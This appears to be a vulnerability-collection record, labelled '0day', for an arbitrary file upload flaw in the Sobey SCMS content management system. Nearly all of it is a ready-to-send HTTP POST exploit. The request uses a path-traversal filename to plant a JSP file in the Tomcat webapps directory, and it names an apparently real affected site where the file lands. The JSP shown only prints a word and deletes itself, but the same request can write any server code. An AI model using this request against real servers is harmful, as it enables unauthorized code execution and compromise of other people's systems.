vendor = "索贝"
name = "SCMS 索贝内容管理系统任意文件上传漏洞"
type = "文件上传"
version = "未知"
path = "/sobey-mchEditor/watermark/upload"
detail = "POST /sobey-mchEditor/watermark/upload HTTP/1.1 Host: Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN Connection: keep-alive Content-Length: 350 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2MPk8DnbXZiTAx15 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 ------WebKitFormBoundary2MPk8DnbXZiTAx15 Content-Disposition: form-data; name=\"file\"; filename=\"../../../../../../../../../usr/local/tomcat/webapps/sobey-mchEditor/123.jsp\" Content-Type: image/jpeg <% out.print(\"test\"); new java.io.File(application.getRealPath(request.getServletPath())).delete();%> ------WebKitFormBoundary2MPk8DnbXZiTAx15-- https://www.oyun.org.cn/sobey-mchEditor/123.jsp"
fix = "未知"
date = "0705"
label = "0day"
verifier = "sxf"
